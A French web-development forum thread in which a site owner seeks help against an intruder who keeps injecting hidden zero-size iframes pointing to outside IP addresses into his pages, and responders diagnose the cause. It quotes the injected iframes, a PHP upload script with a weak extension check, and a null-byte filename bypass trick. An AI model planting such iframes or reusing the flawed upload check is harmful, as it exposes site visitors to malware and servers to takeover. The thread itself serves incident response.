IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Langage PHP Discussion :

Faille de sécurité dans mon site [PHP 5.0]


Sujet :

Langage PHP

  1. #1
    Membre averti
    Profil pro
    Inscrit en
    Mai 2009
    Messages
    24
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mai 2009
    Messages : 24
    Par défaut Faille de sécurité dans mon site
    Bonjour a tous,

    le problème arrive sur mon site.

    j'ai pu me rendre compte du hack en voyant un grand espace au dessus de mon header.

    une personne a réussi a inséré dans mon code les lignes suivante.

    ATTENTION LES LIEN SUIVANT SONT PROBABLEMENT VEROLE bloquer votre js et n'accepter pas le java si vous souhaitez tester les lien

    Code html : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    <iframe src="http://212.224.126.67/ogame/info/index.html" width="0" hight="0" frameborder="0"></iframe>
     
    <iframe src="http://212.224.126.67/ogame/info2/index.html" width="0" hight="0" frameborder="0"></iframe>
     
    <iframe src="http://212.224.126.67/ogame/info3/index.html" width="0" hight="0" frameborder="0"></iframe> 
     
    Aprés avoir remplacé les fichier il a recommencé a avec cette ligne!
     
    <iframe src="http://85.214.245.151/test/index.html" width="0" hight="0" frameborder="0"></iframe>

    pour corrigé le problème j'ai changé mes droit de ftp de 705 a 505 mais cela ne change rien il arrive encore a écrire dans mes fichier...

    j'ai changé mes log ftp... mais cela ne change rien.

    je ne trouve pas de solution , si vous avez une idée pour l’empêché de recommencé se me serai fort utile!

    je suis a votre écoute pour plus d'information!

    merci par avance pour votre aide! je suis vraiment désespéré cela fait plusieurs semaine qu'il s'acharne...

  2. #2
    Modérateur
    Avatar de grunk
    Homme Profil pro
    Lead dév - Architecte
    Inscrit en
    Août 2003
    Messages
    6 693
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 42
    Localisation : France, Côte d'Or (Bourgogne)

    Informations professionnelles :
    Activité : Lead dév - Architecte
    Secteur : Industrie

    Informations forums :
    Inscription : Août 2003
    Messages : 6 693
    Par défaut
    1- Vide totalement ton FTP
    2- Scan ton pc de développement pour vérifier l'absence de malware, keylogger, virus ...
    3- Change tes identifiant FTP
    4- Trouve la faille sur ton site
    5- Corrige la faille
    6- Réupload ton site avec une sauvegarde que tu sais saine et avec la faille corrigée

    Pour la faille regarde particulièrement du coté de l'upload de fichier si tu en as un
    Pry Framework php5 | N'oubliez pas de consulter les FAQ Java et les cours et tutoriels Java

  3. #3
    Modérateur
    Avatar de sabotage
    Homme Profil pro
    Inscrit en
    Juillet 2005
    Messages
    29 208
    Détails du profil
    Informations personnelles :
    Sexe : Homme

    Informations forums :
    Inscription : Juillet 2005
    Messages : 29 208
    Par défaut
    Est-ce que tu as un formulaire d'upload sur ton site ?
    Est-ce que tu as les logs d'activité de ton serveur FTP ?
    Est-ce qu'il s'agit d'un hebergement mutualisé ?
    Est-ce que tu as effacé / remis tous les fichiers de ton site ?
    N'oubliez pas de consulter les FAQ PHP et les cours et tutoriels PHP

  4. #4
    Membre averti
    Profil pro
    Inscrit en
    Mai 2009
    Messages
    24
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mai 2009
    Messages : 24
    Par défaut
    Citation Envoyé par sabotage Voir le message
    Est-ce que tu as un formulaire d'upload sur ton site ?
    Est-ce que tu as les logs d'activité de ton serveur FTP ?
    Est-ce qu'il s'agit d'un hebergement mutualisé ?
    Est-ce que tu as effacé / remis tous les fichiers de ton site ?
    1) oui j'ai vérifier de ce coté et rien
    2) non je peut les trouvé ou?
    3) oui je suis chez ovh
    4) oui a chaque fois je suis en train de faire un nettoyage avancé

  5. #5
    Membre averti
    Profil pro
    Inscrit en
    Mai 2009
    Messages
    24
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mai 2009
    Messages : 24
    Par défaut
    Citation Envoyé par grunk Voir le message
    1- Vide totalement ton FTP
    2- Scan ton pc de développement pour vérifier l'absence de malware, keylogger, virus ...
    3- Change tes identifiant FTP
    4- Trouve la faille sur ton site
    5- Corrige la faille
    6- Réupload ton site avec une sauvegarde que tu sais saine et avec la faille corrigée

    Pour la faille regarde particulièrement du coté de l'upload de fichier si tu en as un


    1) je ne peut pas supprimer certain dossier trop lourd... plusieurs GO
    2)vérifier il y avais un malware
    3) ok
    et a partir de 4 c'est ca que j'ai besoin de votre aide

  6. #6
    Modérateur
    Avatar de grunk
    Homme Profil pro
    Lead dév - Architecte
    Inscrit en
    Août 2003
    Messages
    6 693
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 42
    Localisation : France, Côte d'Or (Bourgogne)

    Informations professionnelles :
    Activité : Lead dév - Architecte
    Secteur : Industrie

    Informations forums :
    Inscription : Août 2003
    Messages : 6 693
    Par défaut
    Si tu ne supprime pas tous les dossiers du ftp tu prend le risque de laisser des fichiers qui vont continuer à polluer ton site ad vitam aeternam.

    Sans code on peut pas t'aider à identifier la faille.
    Contact OVH en leur demandant les logs du serveur sur la période où à eu lieu l'attaque pour savoir d'ou viennent les attaques. Après c'est pas sur qu'il veuille/puisse te les donner.

    A partir du moment où tu sais que l'attaque vient d'une page en particulier c'est déjà plus facile d'identifier le problème.

    Montre nous ton script d'upload des fois que ...
    Pry Framework php5 | N'oubliez pas de consulter les FAQ Java et les cours et tutoriels Java

  7. #7
    Membre averti
    Profil pro
    Inscrit en
    Mai 2009
    Messages
    24
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mai 2009
    Messages : 24
    Par défaut
    oui je sais le code date un peut (presque 7 ans) ... je codai en procédural j'ai un peut honte ^^
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    if(isset($_FILES['avatar']))
    {
     
        $repertoireDestination = $_SERVER['DOCUMENT_ROOT']. '/images/upload/';
        $selection="/images/upload/";
        $nomOrigine = $_FILES['avatar']['name'];
        $elementsChemin = pathinfo($nomOrigine);
        $extensionFichier = $elementsChemin['extension'];
        $extensionsAutorisees = array("jpg", "gif", "png", "jpeg", "bmp", "PNG", "GIF", "JPEG");
        if (!(in_array($extensionFichier, $extensionsAutorisees))) 
            {echo "<p>L\'image n'a pas l'extension attendue</p>";} 	
        else 
        {  
            //insert  et récupération id max  $nb_max
            $nomDestination = "".$nb_max.".".$extensionFichier;
    	echo '<table class="tablebg" width="100%">
    	<tr class="row2">
    	<td>';
    	if (move_uploaded_file($_FILES["avatar"]["tmp_name"], $repertoireDestination.$nomDestination)) 
    	{
    	    echo'<fieldset>
    	    <legend><h1>'.$trad_altimg_4.'</h1></legend>
    	    <table class="tablebg" width="100%">
    	    <tr class="row2">
    	    <th>'.$trad_altimg_5.'</th>
    	    <td>
    	    <input type="text" size="100%"  onClick="this.select();"
    	        value="http://www.projet-alternative.fr/images/upload/'.$nb_max.'.'.$extensionFichier.'">
    	    </td>
    	    </tr><tr class="row2">
    	    <th>'.$trad_altimg_6.'</th>
    	    <td><input size="100%" type="text" onClick="this.select();"  
    		value="<img src=\'http://www.projet-alternative.fr/images/upload/'.$nb_max.'.'.$extensionFichier.'\'>"></td>
    	    </tr><tr class="row2">
    	    <th>'.$trad_altimg_7.'</th>
    	    <td>
    	    <input size="100%" type="text" onClick="this.select();"  
    		value=""></td>
    	    </tr></table></fieldset>';
    	} 
    	else 
    	{
    	    //supréssion de la base si erreur
    	    echo '
    	    <fieldset>
    	    <legend><h1>'.$trad_altimg_8.'</h1></legend>
    	    <p>'.$trad_altimg_9.'</p>
    	    <p>'.$trad_altimg_10.'</p>
    	    </fieldset>';
    	}
    	echo'</td></tr></table>';
        }
    }
    je viens de modifier mon code, seul les utilisateurs connectez du site peuvent upload

  8. #8
    Expert confirmé
    Avatar de Benjamin Delespierre
    Profil pro
    Développeur Web
    Inscrit en
    Février 2010
    Messages
    3 929
    Détails du profil
    Informations personnelles :
    Âge : 38
    Localisation : France, Alpes Maritimes (Provence Alpes Côte d'Azur)

    Informations professionnelles :
    Activité : Développeur Web
    Secteur : High Tech - Opérateur de télécommunications

    Informations forums :
    Inscription : Février 2010
    Messages : 3 929
    Par défaut
    T'es vulnérable aux attaques par nom de fichiers nom.jpg\0.phpC'est sûrement par là que l'attaquant est passé. Valide le nom de fichier avec une regexp avant d'extraire l'extension pour la comparer.

    Vérifie ton répertoire d'avatars, je parie qu'il y a des .php dedans.

  9. #9
    Membre averti
    Profil pro
    Inscrit en
    Mai 2009
    Messages
    24
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mai 2009
    Messages : 24
    Par défaut
    merci pour la faille je viens de la corrigé.

    a première vu il n'a pas utilisé cette faille

    je ne voit pas de .php ... en même temps je renomme mes images...

    http://www.projet-alternative.fr/images/upload/

  10. #10
    Expert confirmé
    Avatar de Benjamin Delespierre
    Profil pro
    Développeur Web
    Inscrit en
    Février 2010
    Messages
    3 929
    Détails du profil
    Informations personnelles :
    Âge : 38
    Localisation : France, Alpes Maritimes (Provence Alpes Côte d'Azur)

    Informations professionnelles :
    Activité : Développeur Web
    Secteur : High Tech - Opérateur de télécommunications

    Informations forums :
    Inscription : Février 2010
    Messages : 3 929
    Par défaut
    http://www.projet-alternative.fr/images/upload/ 404 (en vidéo)

    C'est ptet pas par là qu'il est passé alors. Dans le doute, vérifie et change tes codes FTP.

  11. #11
    Membre averti
    Profil pro
    Inscrit en
    Mai 2009
    Messages
    24
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mai 2009
    Messages : 24
    Par défaut
    désolé j'ai remit la redirection un peut trop tot.

    c'est bon

    j'ai changé mes codes ftp.

    les fichier modifier par la hacker n'avais pas été modifier (la date est resté inchangé) mais ils ont tout de même été modifier.

  12. #12
    Expert confirmé
    Avatar de Benjamin Delespierre
    Profil pro
    Développeur Web
    Inscrit en
    Février 2010
    Messages
    3 929
    Détails du profil
    Informations personnelles :
    Âge : 38
    Localisation : France, Alpes Maritimes (Provence Alpes Côte d'Azur)

    Informations professionnelles :
    Activité : Développeur Web
    Secteur : High Tech - Opérateur de télécommunications

    Informations forums :
    Inscription : Février 2010
    Messages : 3 929
    Par défaut
    les fichier modifier par la hacker n'avais pas été modifier (la date est resté inchangé) mais ils ont tout de même été modifier.


    Gné ?

  13. #13
    Membre averti
    Profil pro
    Inscrit en
    Mai 2009
    Messages
    24
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mai 2009
    Messages : 24
    Par défaut
    sur le ftp on peut voire la dernière modification.
    les fichiers qu'il a modifier on toujours la même date. ce qui fait que je ne peut pas savoir si un fichier a été modifier. ou quand il a été modifier

  14. #14
    Membre averti
    Profil pro
    Inscrit en
    Mai 2009
    Messages
    24
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mai 2009
    Messages : 24
    Par défaut
    il a recommencé...

    Dans mon code source on peut voir
    Dans les première ligne de celui-ci.

    Code html : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
     <iframe src="http://goo .gl/KzqiGl" width="0" hight="0" frameborder="0"></iframe>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <head>

    je suis en train de vérifier avec analytics si il recommence pour avoir une idéé de la page attaquer...

    dans mes log erreur 404 j'ai pu trouver cela

    /images/upload/%27%3C/span%3E.%3Cspan%20style=color:%20

    et ca

    /gestion/redir.php?isImage=1&url=http%3A%2F%2Fimage.noelshack.com%2Ffichiers%2F2012%2F15%2F1334502281-ALERTEEE.gif
    et ce-ci

    /conect/function.mysql-connect

  15. #15
    Expert confirmé
    Avatar de rawsrc
    Homme Profil pro
    Dev indep
    Inscrit en
    Mars 2004
    Messages
    6 142
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 50
    Localisation : France, Bouches du Rhône (Provence Alpes Côte d'Azur)

    Informations professionnelles :
    Activité : Dev indep

    Informations forums :
    Inscription : Mars 2004
    Messages : 6 142
    Billets dans le blog
    12
    Par défaut
    Salut

    Il faudrait aussi envisager que l'attaquant utilise une faille critique liée à ta version de PHP et non obligatoirement une faille dans ton code source.
    PHP 5.0 date de juillet 2004. Il serait peut-être utile de passer à une version plus récente, non ?

  16. #16
    Expert confirmé
    Avatar de Benjamin Delespierre
    Profil pro
    Développeur Web
    Inscrit en
    Février 2010
    Messages
    3 929
    Détails du profil
    Informations personnelles :
    Âge : 38
    Localisation : France, Alpes Maritimes (Provence Alpes Côte d'Azur)

    Informations professionnelles :
    Activité : Développeur Web
    Secteur : High Tech - Opérateur de télécommunications

    Informations forums :
    Inscription : Février 2010
    Messages : 3 929
    Par défaut
    Je pose la question à tout hasard, mais y'a pas d'eval dans ton code si ?

  17. #17
    Membre averti
    Profil pro
    Inscrit en
    Mai 2009
    Messages
    24
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mai 2009
    Messages : 24
    Par défaut
    @rawsrc

    effectivement je vien de passé a "SetEnv PHP_VER 5_4"

    @Benjamin Delespierre

    il y en a dans le js mais pas dans le php

    utilisé dans

    theme/highslide un script pour agrandir mes images (zoomé dessu) c'est grave?


    Merci pour votre aide!

    la dernière foi qu'il a attaquer il a écrie dans mon fichier php des connexion serveur... depuis j'ai changé son droit d'aces en 404

  18. #18
    Membre averti
    Profil pro
    Inscrit en
    Mai 2009
    Messages
    24
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mai 2009
    Messages : 24
    Par défaut
    j'ai eu plusieurs nouvelle attaque ce matin j'ai donc décidé de changé la sécurité de mes dossier et fichier.

    tout mes dossier sont maintenant en 505 et mes fichier en 404 j'attend pour voir si cela change quelque chose...

  19. #19
    Membre averti
    Profil pro
    Inscrit en
    Mai 2009
    Messages
    24
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mai 2009
    Messages : 24
    Par défaut
    cela n'a rien changé il a réussi a changé les droit d'un fichier a 555 puis a 777 pour y écrire encore ces iframe.

    je commence a réellement désespéré :'(

  20. #20
    Expert confirmé
    Avatar de rawsrc
    Homme Profil pro
    Dev indep
    Inscrit en
    Mars 2004
    Messages
    6 142
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 50
    Localisation : France, Bouches du Rhône (Provence Alpes Côte d'Azur)

    Informations professionnelles :
    Activité : Dev indep

    Informations forums :
    Inscription : Mars 2004
    Messages : 6 142
    Billets dans le blog
    12
    Par défaut
    Si malgré le changement intégral de tous les mots de passe et des droits sur les dossiers il arrive quand même à bidouiller tes sources, il faudrait vraiment se pencher sur un trojan ou rootkit présent sur ton poste de développement.

    Est ce que tu peux changer tes mots de passe à partir d'un autre poste et laisser reposer histoire de voir si la faille n'est pas liée à ton ordinateur.

+ Répondre à la discussion
Cette discussion est résolue.
Page 1 sur 2 12 DernièreDernière

Discussions similaires

  1. Réponses: 4
    Dernier message: 01/08/2012, 00h22
  2. Faille de sécurité dans mon site
    Par gitedoublel dans le forum Langage
    Réponses: 65
    Dernier message: 21/07/2009, 18h41
  3. Déterminer les failles de sécurités sur mon site
    Par whitespirit dans le forum EDI, CMS, Outils, Scripts et API
    Réponses: 2
    Dernier message: 05/06/2008, 07h36
  4. [MySQL] Comment créer une sous catégorie dans mon site ?
    Par plex dans le forum PHP & Base de données
    Réponses: 5
    Dernier message: 18/08/2006, 09h59
  5. Images dans mon site qui deforment tout
    Par warrendc dans le forum Balisage (X)HTML et validation W3C
    Réponses: 4
    Dernier message: 26/06/2006, 14h32

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo